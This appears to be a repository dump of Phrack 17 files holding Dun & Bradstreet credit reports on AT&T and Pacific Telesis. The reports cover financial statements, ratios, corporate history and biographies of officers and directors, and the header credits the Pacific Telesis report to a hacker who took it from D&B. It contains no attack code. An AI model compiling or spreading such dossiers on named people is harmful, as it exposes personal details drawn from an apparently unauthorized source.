Working Capital . . . . . . . 5,430,100 (10.8) ---- ----
RATIOS % ---INDUSTRY QUARTILES---
COMPANY CHANGE UPPER MEDIAN LOWER
(SOLVENCY)
Quick Ratio . . . . . . . . . 1.0 ---- 2.5 1.1 0.6
Current Ratio . . . . . . . . 1.5 ---- 3.8 1.9 0.9
Curr Liab to Net Worth (%). . 78.5 6.5 15.8 29.4 43.9
Curr Liab to Inventory (%). . 241.4 2.8 285.7 485.5 790.6
Total Liab to Net Worth (%) . 176.5 9.6 134.4 190.1 320.9
Fix Assets to Net Worth (%) . 151.1 9.7 148.4 219.0 289.5
(EFFICIENCY)
Coll Period (days). . . . . . 94.1 (8.7) 31.5 47.2 63.8
Sales to Inventory. . . . . . 7.3 5.8 52.3 31.4 18.0
Assets to Sales (%) . . . . . 115.9 (3.4) 217.1 277.8 356.8
Sales to Net Working Cap. . . 6.4 16.4 6.0 2.7 1.6
Acct Pay to Sales (%) . . . . 14.2 (15.5) 6.1 10.4 15.7
(PROFITABILITY)
Return on Sales (%) . . . . . 4.5 9.8 19.0 13.6 9.5
Return on Assets (%). . . . . 3.8 11.8 6.9 5.3 3.4
Return on Net Worth (%) . . . 10.6 17.8 19.7 15.8 12.7
Industry norms based on 605 firms,
with assets over $5 million.
12/31/84 COMBINATION FISCAL
(Figures are in THOUSANDS)
FINANCIALS COMPANY INDST
COMPANY % NORM %
Cash. . . . . . . . . . . . . 2,139,900 5.4 6.6
Accounts Receivable . . . . . 9,370,800 23.5 6.3
Notes Receivable. . . . . . . ---- ---- 0.4
Inventory . . . . . . . . . . 4,789,200 12.0 1.2
Other Current Assets. . . . . 1,033,100 2.6 4.1
Total Current Assets. . . . . 17,333,000 43.5 18.6
Fixed Assets. . . . . . . . . 21,015,000 52.8 45.0
Other Non-current Assets. . . 1,478,600 3.7 36.4
Total Assets. . . . . . . . . 39,826,600 100.0 100.0
Accounts Payable. . . . . . . 5,580,300 14.0 5.2
Bank Loans. . . . . . . . . . ---- ---- 0.2
Notes Payable . . . . . . . . ---- ---- 1.0
Other Current Liabilities . . 5,663,300 14.2 5.5
Total Current Liabilities . . 11,243,600 28.2 11.9
Other Long Term Liab. . . . . 9,300,200 23.4 47.8
Deferred Credits. . . . . . . 4,026,000 10.1 6.5
Net Worth . . . . . . . . . . 15,256,800 38.3 33.8
Total Liabilities & Worth. . 39,826,600 100.0 100.0
Net Sales . . . . . . . . . . 33,187,500 100.0 100.0
Gross Profit. . . . . . . . . 16,436,200 49.5 28.1
Net Profit After Tax. . . . . 1,369,900 4.1 14.1
Dividends/Withdrawals . . . . 1,333,800 4.0 7.3
Working Capital . . . . . . . 6,089,400 ---- ----
RATIOS ---INDUSTRY QUARTILES---
COMPANY UPPER MEDIAN LOWER
(SOLVENCY)
Quick Ratio . . . . . . . . . 1.0 2.3 1.0 0.6
Current Ratio . . . . . . . . 1.5 3.4 1.6 0.9
Curr Liab to Net Worth (%). . 73.7 17.7 30.6 43.5
Curr Liab to Inventory (%). . 234.8 312.5 491.6 754.3
Total Liab to Net Worth (%) . 161.0 139.2 193.7 314.9
Fix Assets to Net Worth (%) . 137.7 161.5 228.9 295.3
(EFFICIENCY)
Coll Period (days). . . . . . 103.1 34.3 51.6 67.8
Sales to Inventory. . . . . . 6.9 52.1 32.6 20.1
Assets to Sales (%) . . . . . 120.0 216.7 268.2 353.0
Sales to Net Working Cap. . . 5.5 7.2 3.1 1.7
Acct Pay to Sales (%) . . . . 16.8 6.2 10.9 15.4
(PROFITABILITY)
Return on Sales (%) . . . . . 4.1 18.5 13.1 9.8
Return on Assets (%). . . . . 3.4 7.0 5.3 3.3
Return on Net Worth (%) . . . 9.0 19.7 15.7 12.6
Industry norms based on 504 firms,
with assets over $5 million.
END OF DOCUMENT
Name & Address:
AMERICAN TELEPHONE AND Trade-Style Name:
550 Madison Ave At & T
NEW YORK, NY 10022
Telephone: 212-605-5300
DUNS Number: 00-698-0080
Line of Business: TELECOMMUNICATIONS SVCS TELE
Primary SIC Code: 4811
Secondary SIC Codes: 4821 3661 3357 3573 5999
Year Started: 1885 (12/31/86) COMBINATION FISCAL
Employees Total: 317,000 Sales: 34,087,000,000
Employees Here: 1,800 Net Worth: 14,462,000,000
This is a PUBLIC company
HISTORY
04/20/87
JAMES E. OLSON, CHB-CEO+ ROBERT E. ALLEN, PRES-COO+
RANDALL L TOBIAS, V CHM+ CHARLES MARSHALL, V CHM+
MORRIS TANENBAUM, V CHM+ S. LAWRENCE PRENDERGAST, V PRES-
TREAS
C. PERRY COLWELL, V PRES-
CONTROLLER
DIRECTOR(S): The officers identified by (+) and Howard H. Baker Jr,
James H. Evans, Peter F. Haas, Philip M. Hawley, Edward G. Jefferson,
Belton K. Johnson, Juanita M. Kreps, Donald S. Perkins, Henry B.
Schacht, Michael I. Sovern, Donald F. McHenry, Rawleigh Warner Jr,
Joseph D. Williams and Thomas H. Wyman.
Incorporated New York Mar 3 1885.
Authorized capital consists of 1,200,000,000 shares common stock $1
par value and 100,000,000 shares preferred stock $1 par value.
Outstanding Capital Stock at Feb 28 1987: 1,071,904,000 common
shares and at Dec 31 1986 preferred stock outstanding consisted of
redeemable preferred shares composed of 8,500,000 shares of $3.64
preferred stated value $50; 8,800,000 shares of $3.74 preferred, stated
value $50 and 25,500 shares of $77.50 preferred, stated value $1,000.
Business started 1885.
The company's common stock is listed on the New York, Boston,
Midwest, Philadelphia and Pacific Coast Stock Exchanges under the symbol
"ATT". At Dec 31 1986 there were 2,782,102 common shareholders. At Jan 1
1986 officers and directors as a group owned less than 1% of the
outstanding common stock with the remainder owned by the public.
OLSON, born 1925. 1950 Univ of North Dakota, BSC. Also attended
Univ of Pennsylvania. 1943-1946 United States Army Air Force. 1960-1970
Northwestern Bell Telephone Co, V Pres-Gen Mgr. 1970-1974 Indiana Bell
Telephone Co, Pres. 1974-1977 Illinois Bell Telephone Co, Pres. 1977 to
date AT&T, 1979 V Chb-Dir; Jun 1985 President, 1986 CHM.
MARSHALL, born 1929, married. 1951 Univ of Illinois, BS; also
attended Bradley Univ; 1953-present AT&T; 1980 Asst Treas, 1976 Vice
Pres-Treas; 1985 Exec Vice President, 1986 V-CHM.
TANENBAUM, born 1928 married. 1949 Johns Hopkins Univ, BA
chemistry. 1950 Princeton Univ, MA chemistry. 1952 PhD in physical
chemistry. 1952 to date AT&T, various positions, 1985 Ex Vice Pres, 1986
V-CHM.
PRENDERGAST, born 1941 married. 1963 Brown Univ, BA. 1969 New York
Univ, MBA. 1963-1973 Western Electric Company; 1973 to date AT&T, 1980
Asst Treas, 1984 V Pres-Treas.
COLWELL, born 1927. Attended AT&T Institute of Technology.
1945-1947 U S Army. Employed by AT&T and its subsidiaries since 1948 in
various positions. 1984 Vice Pres & Contr, AT&T Technologies Inc
(subsidiary); 1985-present V Pres-Contr.
ALLEN born 1935 married. 1957 Wabash College BA. Has held a
vareity of executive position with former Bell Operating subsidiaries
and AT&T subsidiaries. Appointed to current position in 1986.
TOBIAS born 1943. 1964 Indiana University with a BS in Marketing.
Has held a variety of management and executive positions with former
Bell Operating subsidiaries and AT&T subsidiaries. Elected to current
position in 1986.
OTHER OFFICERS: James R. Billingsley, Sr V Pres Federal
Regulation; Michael Brunner, Ex V Pres Federal Systems; Harold
Burlingame, Sr V Pres Public Relations and Employee Information;
Vittorio Cassoni, Sr V Pres Data Systems Division; Richard Holbrook, Sr
V Pres Business Sales; Robert Kavner, Sr V Pres & CFO; Gerald Lowrie, Sr
V Pres Public Affairs; John Nemecek, Ex V Pres Components & Electronic
Systems; John O'Neill, Ex V Pres National Systems Products; Alfred
Partoll, Sr V Pres External Affairs; John Segall, Sr V Pres Corporate
Strategy & Development; Alexander Stack, Sr V Pres Communications
Systems; Paul Villiere, Ex V Pres Network Systems Marketing and Customer
Operations; John Zegler, Sr V Pres and General Counsel; and Lydell
Christensen, Corp V Pres and Secretary.
DIRECTORS: MCHENRY, research professor, Georgetown University.
BAKER JR, partner, Vinson & Elkins and Baker, Worthington, Crossley,
Stansberry & Woolf, attorneys. EVANS, former Chairman, Union Pacific
Corporation. HAAS, Chairman, Levi Strauss & Company. HAWLEY, Chairman,
Carter Hawley Hale Stores Inc. JEFFERSON, former Chairman, E.I. du Pont
de Nemours and Company. JOHNSON, private investor and owner of The
Chaparrosa Ranch. KREPS, former United States Secretary of Commerce.
PERKINS, former Chairman, Jewel Companies Inc. SCHACHT, Chairman,
Cummins Engine Company Inc. SOVERN, President, Columbia University.
WARNER JR, former Chairman, Mobil Corporation. WILLIAMS, Chairman,
Warner Lambert Company. WYMAN, former Chairman, CBS Inc.
As a result of an antitrust action entered against American
Telephone and Telegraph Company (AT&T) by the Department of Justice,
AT&T agreed in Jan 1982 to break up its holdings. In Aug 1982, the U. S.
District Court-District of Columbia, entered a consent decree requiring
AT&T to divest itself of portions of its operations.
The operations affected consisted of exchange telecommunications,
exchange access functions, printed directory services and cellular radio
telecommunications services. AT&T retained ownership of AT&T
Communications Inc, AT&T Technologies Inc, Bell Telephone Laboratories
Incorporated, AT&T Information Systems Inc, AT&T International Inc and
those portions of the 22 Bell System Telephone Company subsidiaries
which manufactured new customer premises equipment. The consent decree,
with modifications, was agreed to by AT&T and the U. S. Department of
Justice and approved by the U. S. Supreme Court in Feb 1983. In Dec
1982, AT&T filed a plan of reorganization, outlining the means of
compliance with the divestiture order. The plan was approved by the
court in Aug 1983
The divestiture completed on Jan 1 1984, was accomplished by the
reorganization of the 22 principal AT&T Bell System Telephone Company
subsidiaries under 7 new regional holding companies. Each AT&T common
shareowner of record as of Dec 10 1983 received 1 share of common stock
in each of the newly formed corporations for every 10 common shares of
AT&T. AT&T common shareowners retained their AT&T stock ownership.
The company has an ownership interest in certain ventures to
include:
(1) Owns 22% of the voting stock of Ing C. Olivetti & C., S.p.A. of
Milan, Italy with which the company develops and markets office
automation products in Europe.
(2) Owns 50% of a joint venture with the N. V. Philips Company of
the Netherlands organized to manufacture and market switching and
transmission systems in Europe and elsewhere.
(3) Owns 44% of a joint venture with the Goldstar Group of the
Republic of Korea which manufactures switching products and distributes
the company's 3B Family of Computers in Korea.
The company also maintain stock interests in other concerns.
In addition to joint venture activities described above,
intercompany relations have also included occasional advances from
subject.
OPERATION
04/20/87
Through subsidiaries, provides intrastate, interstate and
international long distance telecommunications and information transport
services, a broad range of voice and data services including, Domestic
and Long Distance Service, Wide Area Telecommunications Services (WATS),
800 Service, 900 Dial It Services and a series of low, medium and high
speed digital voice and data services known as Accunet Digital Services.
Also manufactures telephone communications equipment and apparatus,
communications wire and cable, computers for use in communications
systems, as well as for general purposes, retails and leases telephone
communications equipment and provides research and development in
information and telecommunications technology. The company is subject to
the jurisdiction of the Federal Communications Commission with respect
to interstate and international rates, lines, services and other
matters. Terms: Net 30, cash and contract providing for progress
payments with final payment upon completion. The company's AT&T
Communications Inc subsidiary provides interstate and intrastate long
distance communications services for 80 million residential customers
and 7 million businesses. Sells to a wide variety of businesses,
government agencies, individuals and others. Nonseasonal.
EMPLOYEES: 317,000 including officers. 1,800 employed here.
FACILITIES: Owns premises in multi story steel building in good
condition. Premises neat.
LOCATION: Central business section on main street.
BRANCHES: The company's subsidiaries operate 19 major manufacturing
plants located throughout the United States containing a total 26.2
million square feet of space of which 1.49 million square feet were in
leased premises. There are 7 regional centers and 24 distribution
centers. In addition, there are numerous domestic and foreign branch
offices.
SUBSIDIARIES: The company had numerous subsidiaries as of Dec 31
1986. Subsidiaries perform the various services and other functions
described above. Its unconsolidated finance subsidiary, AT&T Credit
Corporation, provides financing to customers through leasing and
installment sales programs and purchases from AT&T's subsidiaries the
rights to receivables under long-term service agreements. Intercompany
relations consists of parent making occasional advances to subsidiaries
and service transactions settled on a convenience basis. A list of
principal subsidiaries as of Dec 31 1986 is on file at the Millburn, NJ
office of Dun & Bradstreet.
08-27(9Z0 /61) 00703 001 678 NH
Chemical Bank, 277 Park Ave; Marine Midland Bank, 140 Broadway; Chase
Manhattan Bank, 1 Chase Manhattan Plaza
12/31/86 COMBINATION FISCAL
(Figures are in THOUSANDS)
FINANCIALS % COMPANY INDST
COMPANY CHANGE % NORM %
Total Current Assets. . . . . 15,572,000 (8.0) 40.0 22.0
Fixed Assets. . . . . . . . . 21,078,000 (4.7) 54.2 35.6
Other Non-current Assets. . . 2,233,000 55.9 5.7 42.4
Total Assets. . . . . . . . . 38,883,000 (3.9) 100.0 100.0
Total Current Liabilities . . 11,217,000 (2.4) 28.8 11.6
Other Long Term Liab. . . . . 13,204,000 38.2 34.0 46.8
Net Worth . . . . . . . . . . 14,462,000 (1.2) 37.2 35.2
Total Liabilities & Worth. . 38,883,000 (3.9) 100.0 100.0
Net Sales . . . . . . . . . . 34,087,000 (2.4) 100.0 100.0
Gross Profit. . . . . . . . . 15,838,000 ---- 46.5 40.1
RATIOS % ---INDUSTRY QUARTILES---
COMPANY CHANGE UPPER MEDIAN LOWER
Quick Ratio . . . . . . . . . 0.9 (10.0) 2.9 1.2 0.6
Current Ratio . . . . . . . . 1.4 (6.7) 4.9 2.2 1.0
Total Liab to Net Worth (%) . 168.9 (4.3) 127.4 180.2 297.2
Sales to Inventory. . . . . . 9.7 32.9 56.2 33.8 20.0
Return on Sales (%) . . . . . 0.4 (91.1) 20.1 14.6 11.3
Return on Assets (%). . . . . 0.4 (89.5) 7.2 5.7 3.7
Return on Net Worth (%) . . . 1.0 (90.6) 19.0 15.9 12.8
Industry norms based on 469 firms,
with assets over $5 million.
End_of_File.

493
phrack17/3.txt Normal file
View file

@ -0,0 +1,493 @@
% = % = % = % = % = % = % = %
= =
% P h r a c k X V I I %
= =
% = % = % = % = % = % = % = %
Phrack Seventeen
07 April 1988
File 3 of 12 : Dun & Bradstreet Report on Pacific Telesis
Pacific Telesis Credit File, taken from Dun & Bradstreet by Elric of Imrryr
Name & Address:
PACIFIC TELESIS GROUP (INC)
140 New Montgomery St
SAN FRANCISCO, CA 94105
Telephone: 415-882-8000
DUNS Number: 10-346-0846
Line of Business: TELECOMMUNICATION SERVICES
Primary SIC Code: 4811
Secondary SIC Codes: 2741 5063 5732 6159
Year Started: 1906 (12/31/86) COMBINATION FISCAL
Employees Total: 74,937 Sales: 8,977,300,000
Employees Here: 2,000 Net Worth: 7,753,300,000
This is a PUBLIC company
12/31/86 COMBINATION FISCAL
(Figures are in THOUSANDS)
FINANCIALS % COMPANY INDST
COMPANY CHANGE % NORM %
Cash. . . . . . . . . . . . . 200,600 671.5 1.0 9.0
Accounts Receivable . . . . . 1,390,700 (3.8) 6.8 5.7
Notes Receivable. . . . . . . ---- ---- ---- 0.2
Inventory . . . . . . . . . . 116,300 (4.4) 0.6 1.3
Other Current Assets. . . . . 448,700 18.6 2.2 5.8
Total Current Assets. . . . . 2,156,300 9.3 10.6 22.0
Fixed Assets. . . . . . . . . 17,244,900 1.6 84.9 35.6
Other Non-current Assets. . . 919,300 53.8 4.5 42.4
Total Assets. . . . . . . . . 20,320,500 4.0 100.0 100.0
Accounts Payable. . . . . . . 1,760,300 74.1 8.7 4.2
Bank Loans. . . . . . . . . . 21,800 847.8 0.1 0.2
Notes Payable . . . . . . . . ---- ---- ---- 1.0
Other Current Liabilities . . 623,000 (35.8) 3.1 6.2
Total Current Liabilities . . 2,405,100 21.3 11.8 11.6
Other Long Term Liab. . . . . 5,564,600 (7.6) 27.4 46.8
Deferred Credits. . . . . . . 4,597,500 9.0 22.6 6.4
Net Worth . . . . . . . . . . 7,753,300 6.0 38.2 35.2
Total Liabilities & Worth. . 20,320,500 4.0 100.0 100.0
Net Sales . . . . . . . . . . 8,977,300 5.6 100.0 100.0
Gross Profit. . . . . . . . . ---- ---- ---- 40.1
Net Profit After Tax. . . . . 1,079,400 16.2 12.0 15.3
Dividends/Withdrawals . . . . 654,100 10.0 7.3 7.7
Working Capital . . . . . . . 248,800 (999.9) ---- ----
RATIOS % ---INDUSTRY QUARTILES---
COMPANY CHANGE UPPER MEDIAN LOWER
(SOLVENCY)
Quick Ratio . . . . . . . . . 0.7 ---- 2.9 1.2 0.6
Current Ratio . . . . . . . . 0.9 (10.0) 4.9 2.2 1.0
Curr Liab to Net Worth (%). . 31.0 14.4 13.2 26.4 38.1
Curr Liab to Inventory (%). . 999.9 26.9 244.8 475.8 675.0
Total Liab to Net Worth (%) . 162.1 (2.9) 127.4 180.2 297.2
Fix Assets to Net Worth (%) . 222.4 (4.1) 144.9 215.0 263.0
(EFFICIENCY)
Coll Period (days). . . . . . 56.5 (9.0) 31.9 46.7 61.6
Sales to Inventory. . . . . . 77.2 10.6 56.2 33.8 20.0
Assets to Sales (%) . . . . . 226.4 (1.5) 210.5 266.1 373.4
Sales to Net Working Cap. . . ---- ---- 6.3 2.3 1.1
Acct Pay to Sales (%) . . . . 19.6 64.7 4.9 8.7 13.8
(PROFITABILITY)
Return on Sales (%) . . . . . 12.0 10.1 20.1 14.6 11.3
Return on Assets (%). . . . . 5.3 10.4 7.2 5.7 3.7
Return on Net Worth (%) . . . 13.9 9.4 19.0 15.9 12.8
Industry norms based on 469 firms,
with assets over $5 million.
12/31/85 COMBINATION FISCAL
(Figures are in THOUSANDS)
FINANCIALS % COMPANY INDST
COMPANY CHANGE % NORM %
Cash. . . . . . . . . . . . . 26,000 550.0 0.1 7.5
Accounts Receivable . . . . . 1,446,200 20.6 7.4 5.6
Notes Receivable. . . . . . . ---- ---- ---- 0.4
Inventory . . . . . . . . . . 121,700 ---- 0.6 1.2
Other Current Assets. . . . . 378,300 (8.3) 1.9 5.1
Total Current Assets. . . . . 1,972,200 22.1 10.1 19.8
Fixed Assets. . . . . . . . . 16,968,400 6.1 86.8 39.2
Other Non-current Assets. . . 597,700 29.4 3.1 41.0
Total Assets. . . . . . . . . 19,538,300 8.1 100.0 100.0
Accounts Payable. . . . . . . 1,011,100 14.6 5.2 4.9
Bank Loans. . . . . . . . . . 2,300 ---- ---- 0.3
Notes Payable . . . . . . . . ---- ---- ---- 0.8
Other Current Liabilities . . 969,900 18.6 5.0 5.9
Total Current Liabilities . . 1,983,300 (1.0) 10.2 11.9
Other Long Term Liab. . . . . 6,021,700 0.8 30.8 46.8
Deferred Credits. . . . . . . 4,216,300 16.6 21.6 6.8
Net Worth . . . . . . . . . . 7,317,000 12.9 37.4 34.5
Total Liabilities & Worth. . 19,538,300 8.1 100.0 100.0
Net Sales . . . . . . . . . . 8,498,600 8.6 100.0 100.0
Gross Profit. . . . . . . . . ---- ---- ---- 33.7
Net Profit After Tax. . . . . 929,100 12.1 10.9 14.0
Dividends/Withdrawals . . . . 594,400 11.9 7.0 13.0
Working Capital . . . . . . . 11,100 ---- ---- ----
RATIOS % ---INDUSTRY QUARTILES---
COMPANY CHANGE UPPER MEDIAN LOWER
(SOLVENCY)
Quick Ratio . . . . . . . . . 0.7 16.7 2.5 1.1 0.6
Current Ratio . . . . . . . . 1.0 25.0 3.8 1.9 0.9
Curr Liab to Net Worth (%). . 27.1 (12.3) 15.8 29.4 43.9
Curr Liab to Inventory (%). . 999.9 ---- 285.7 485.5 790.6
Total Liab to Net Worth (%) . 167.0 (6.7) 134.4 190.1 320.9
Fix Assets to Net Worth (%) . 231.9 (6.0) 148.4 219.0 289.5
(EFFICIENCY)
Coll Period (days). . . . . . 62.1 11.1 31.5 47.2 63.8
Sales to Inventory. . . . . . 69.8 ---- 52.3 31.4 18.0
Assets to Sales (%) . . . . . 229.9 (0.5) 217.1 277.8 356.8
Sales to Net Working Cap. . . ---- ---- 6.0 2.7 1.6
Acct Pay to Sales (%) . . . . 11.9 5.3 6.1 10.4 15.7
(PROFITABILITY)
Return on Sales (%) . . . . . 10.9 2.8 19.0 13.6 9.5
Return on Assets (%). . . . . 4.8 4.3 6.9 5.3 3.4
Return on Net Worth (%) . . . 12.7 (0.8) 19.7 15.8 12.7
Industry norms based on 605 firms,
with assets over $5 million.
12/31/84 COMBINATION FISCAL
(Figures are in THOUSANDS)
FINANCIALS COMPANY INDST
COMPANY % NORM %
Cash. . . . . . . . . . . . . 4,000 ---- 6.6
Accounts Receivable . . . . . 1,198,800 6.6 6.3
Notes Receivable. . . . . . . ---- ---- 0.4
Inventory . . . . . . . . . . ---- ---- 1.2
Other Current Assets. . . . . 412,400 2.3 4.1
Total Current Assets. . . . . 1,615,200 8.9 18.6
Fixed Assets. . . . . . . . . 15,999,500 88.5 45.0
Other Non-current Assets. . . 461,800 2.6 36.4
Total Assets. . . . . . . . . 18,076,500 100.0 100.0
Accounts Payable. . . . . . . 882,100 4.9 5.2
Bank Loans. . . . . . . . . . ---- ---- 0.2
Notes Payable . . . . . . . . 304,000 1.7 1.0
Other Current Liabilities . . 817,600 4.5 5.5
Total Current Liabilities . . 2,003,700 11.1 11.9
Other Long Term Liab. . . . . 5,973,500 33.0 47.8
Deferred Credits. . . . . . . 3,617,000 20.0 6.5
Net Worth . . . . . . . . . . 6,482,300 35.9 33.8
Total Liabilities & Worth. . 18,076,500 100.0 100.0
Net Sales . . . . . . . . . . 7,824,300 100.0 100.0
Gross Profit. . . . . . . . . ---- ---- 28.1
Net Profit After Tax. . . . . 828,500 10.6 14.1
Dividends/Withdrawals . . . . 531,200 6.8 7.3
Working Capital . . . . . . . 388,500 ---- ----
RATIOS ---INDUSTRY QUARTILES---
COMPANY UPPER MEDIAN LOWER
(SOLVENCY)
Quick Ratio . . . . . . . . . 0.6 2.3 1.0 0.6
Current Ratio . . . . . . . . 0.8 3.4 1.6 0.9
Curr Liab to Net Worth (%). . 30.9 17.7 30.6 43.5
Curr Liab to Inventory (%). . ---- 312.5 491.6 754.3
Total Liab to Net Worth (%) . 178.9 139.2 193.7 314.9
Fix Assets to Net Worth (%) . 246.8 161.5 228.9 295.3
(EFFICIENCY)
Coll Period (days). . . . . . 55.9 34.3 51.6 67.8
Sales to Inventory. . . . . . ---- 52.1 32.6 20.1
Assets to Sales (%) . . . . . 231.0 216.7 268.2 353.0
Sales to Net Working Cap. . . ---- 7.2 3.1 1.7
Acct Pay to Sales (%) . . . . 11.3 6.2 10.9 15.4
(PROFITABILITY)
Return on Sales (%) . . . . . 10.6 18.5 13.1 9.8
Return on Assets (%). . . . . 4.6 7.0 5.3 3.3
Return on Net Worth (%) . . . 12.8 19.7 15.7 12.6
Industry norms based on 504 firms,
with assets over $5 million.
END OF DOCUMENT
Name & Address:
PACIFIC TELESIS GROUP (INC)
140 New Montgomery St
SAN FRANCISCO, CA 94105
Telephone: 415-882-8000
DUNS Number: 10-346-0846
Line of Business: TELECOMMUNICATION SERVICES
Primary SIC Code: 4811
Secondary SIC Codes: 2741 5063 5732 6159
Year Started: 1906 (12/31/86) COMBINATION FISCAL
Employees Total: 74,937 Sales: 8,977,300,000
Employees Here: 2,000 Net Worth: 7,753,300,000
This is a PUBLIC company
HISTORY
09/01/87
DONALD E GUINN, CHB PRES+ THEODORE J SAENGER, V CHB GROUP
PRES+
SAM L GINN, V CHB+ JOHN E HULSE, V CHB CFO+
ROBERT V R DALENBERG, EX V PRES BENTON W DIAL, EX V PRES-HUM
GEN COUNSEL SEC RESOURCES
ARTHUR C LATNO JR, EX V PRES THOMAS G CROSS, V PRES TREAS
FRANK V SPILLER, V PRES
COMPTROLLER
DIRECTOR(S): The officers identified by (+) and Norman Barker Jr,
William P Clark, Willaim K Coblentz, Myron Du Bain, Herman E Gallegos
James R Harvey, Ivan J Houston, Leslie L Luttgens, E L Mc Neely, S
Donley Ritchey, Willaim French Smith & Mary S Metz.
Incorporated Nevada Oct 26 1983. Authorized capital consists of
505,000,000 shares common stock, $.10 par value.
OUTSTANDING CAPITAL STOCK: Consists of following at Dec 31 1986:
215,274,878 common shares at a stated value of $21.5 million plus
additional paid in capital of $5,068.5 million.
The stock is publicly traded on the New York, Pacific and Midwest
Stock Exchanges. There were 1,170,161 common shareholders at Feb 1 1987.
Officers and directors as a group hold less than 1% of stock. No other
entity owned more than 5% of the common stock outstanding.
The authorized capital stock was increased to $1,100,000,000
shares in 1987 by Charter Amendment. In addition, the company declared a
two-for-one stock split in the form of a 100% stock dividend effective
Mar 25 1987.
BACKGROUND: This business was founded in 1906 as a California
Corporation. The Pacific Telephone & Telegraph Company formed Dec 31
1906. Majority of the stock was held by American Telephone & Telegraph
Co (A T & T), New York, NY, prior to divestiture.
DIVESTITURE: Pursuant to a court oder of the U S District Court for
the Distirict of Columbia, A T & T divested itself of the exchange,
telecommunications, exchange access and printing directory advertising
portions of its 22 wholly-owned subsidiary operating telephone
companies, including the Pacific Telephone & Telegraph Company. A T & T
retains ownership of the former A T & T long lines interstate
organization, as well as those portions of the subsidiaries that provide
interchange services and customer premises equipment. To accomplish the
divestiture, this regional holding company was formed, which took over
the applicable operations and assets of the Pacific Telephone &
Telegraph Company and its subsidiary, Bell Telephone Company of Nevada.
Stock in the subject was distributed to the shareholders of A T & T, who
also retained their existing A T & T Stock. The divestiture was
accomplished on Jan 1 1984.
RECENT EVENTS:During Jun 1986, the company completed the
acquisition of Communications Industries Inc, Dallas, TX.
In Dec 1986, the company's wholly-owned subsidiary Pac Tel Cellular
Inc of Michigan signed an agreement to purhcase five cellular telephone
properties for $316 million plus certain contingent payments. These five
systems operate under the name of Cellular One. This acquaition is
subject to regulatory and court approval and final legal review.
------------------------OFFICERS------------------------.
GUINN born 1932 married. 1954 received BSCE from Oregon State
University. 1954-60 with The Pacific Telephone & Telegraph Company, San
Francisco, CA. 1960-64 with Pacific Northwest Bell Telephone Co,
Seattle, WA, as vice president. 1964-70 with A T & T. 1970-76 with
Pacific Northwest Bell. 1976-80 with A T & T as vice president-network
service. 1980 chairman and chief executive officer of The Pacific
Telephone & Telegraph Company. 1984 with Pacific Telesis Group as
chairman, president and chief executive officer.
SAENGER born 1928 married. 1951 received BS from the University of
California. 1946-47 in the U S Army. 1951-52 secretary and manager for
the Oakland Junior Chamber of Commerce. 1950-70 held various positions
with The Pacific Telephone & Telegraph Company. 1970-71 traffic
operations director for Network Administration in New York, A T & T.
1971 with The Pacific Telephone & Telegraph Company. 1974 vice
president. 1977 president. 1984 with Pacific Telesis Group as vice
chairman and president, Pacific Bell.
GINN born 1937 married. 1959 graduated from Auburn University. 1969
received MS from Stanford University. 1959-60 in the U S Army Signal
Corps as captain. 1960 joined A T & T Long Lines. 1977 vice
president-staff for A T & T Long Lines. 1978 joined The Pacific
Telephone & Telegraph Company as executive vice president-network. 1983
vice chairman. 1984 with Pacific Telesis Group as vice chairman and
group president, PacTel Companies.
HULSE born 1933 married. 1955 received BS from the University of
South Dakota. 1956-58 in the U S Army. 1958 joined Northwestern Bell
Telephone Co. 1980 joined The Pacific Telephone & Telegraph Company as
executive vice president and chief financial officer. 1983 vice
chairman. 1984 with Pacific Telesis Group as vice chairman and chief
financial officer.
LATNO born 1929 married. Received BS degree from the University of
Santa Clara. 1952 with Pacific Telephone & Telegraph Co. 1972 vice
president-regulatory. 1975 executive vice president-external affairs.
1984 with Pacific Telesis Group as executive vice president-external
affairs.
DALENBERG born 1930 married. Graduated from the University of
Chicago Law School and Graduate School of Business. 1956 admitted to
practice at the Illinois Bar and in 1973 the California Bar. 1957-67
private law practice in Chicago, IL. 1967-72 general attorney for
Illinois Bell. 1972-75 general attorney for The Pacific Telephone &
Telegraph Company. 1975 associate general counsel. 1976 vice president
and secretary-general counsel. 1984 with Pacific Telesis Group as
executive vice president and general counsel-secretary.
CROSS. Vice President and Treasurer and also Vice President of
Pacific Bell.
DIAL born 1929 married. 1951 received BA from Whittier College.
1961 received MS from California State University. 1951-53 in the U S
Army. 1954 with The Pacific Telephone & Telegraph Company. 1973 vice
president-regional staff and operations service for Southern California.
1976 vice president-customer operations in Los Angeles, CA. 1977 vice
president-corporate planning. 1980 vice president-human resources. 1984
with Pacific Telesis Group as executive vice president-human resources.
SPILLER born 1931 married. 1953 received BS from the University of
California, San Francisco. 1954-56 in the U S Army as a second
lieutenant. 1953 with The Pacific Telephone & Telegraph Company. 1977
assistant comptroller. 1981 assistant vice president-finance management.
1981 vice president and comptroller. 1984 with Pacific Telesis Group as
vice president and comptroller.
---------------------OTHER DIRECTORS---------------------.
BARKER. Retired chairman of First Interstate Bank Ltd.
CLARK. Of counsel to the law firm of Rogers & Wells.
COBLENTZ. Senior Partner in Coblentz, Cahen, Mc Cabe & Breyer,
Attorneys, San Francisco, CA.
DU BAIN. Chairman of SRI International.
GALLEGOS. Management consultant.
HARVEY. Chairman, and chief executive officer of Transamerica
Corporation, San Francisco, CA.
HOUSTON. Chairman and chief executive officer of Golden State
Mutual Life Insurance Co.
LUTTGENS. Is a community leader.
MC NEELY. Chairman and chief executive officer of Oak Industries,
Inc, San Diego, CA.
RITCHEY. Retired Chairman of Lucky Stores Inc.
SMITH. Partner in Gibson, Dunn & Crutcher, Attorneys.
METZ. President of Mills College.
OPERATION
09/01/87
Pacific Telesis Group is a regional holding company whose
operations are conducted by subsidiaries.
The company's two major subsidiaries, Pacific Bell and Nevada Bell,
provide a wide variety of communications services in California and
Nevada, including local exchange and toll service, network access and
directory advertising, and provided over 90% of total 1986 revenues.
Other subsidiaries, as noted below, are engaged in directory
publishing, cellular mobile communications and services, wholesaling of
telecommunications products, integrated systems and other services,
retails communications equipment and supplies, financing services for
products of affiliated customers, real estate development, and
consulting. Specific percentages of these operations are not available
but in the aggregate represent approximately 10%.
Terms are net 30 days. Has over 11,000,000 accounts. Sells to the
general public and commercial concerns. Territory :Worldwide.
EMPLOYEES: 74,937 including officers. 2,000 employed here.
Employees are on a consolidated basis as of Dec 31 1986.
FACILITIES: Owns over 500,000 sq. ft. in 20 story concrete and
steel building in good condition. Premises neat.
LOCATION: Central business section on side street.
BRANCHES: The subject maintains minor additional administrative
offices in San Francisco, CA, but most operating branches are conducted
by the operating subsidiaries, primarily Pacific Bell and Nevada Bell in
their respective states.
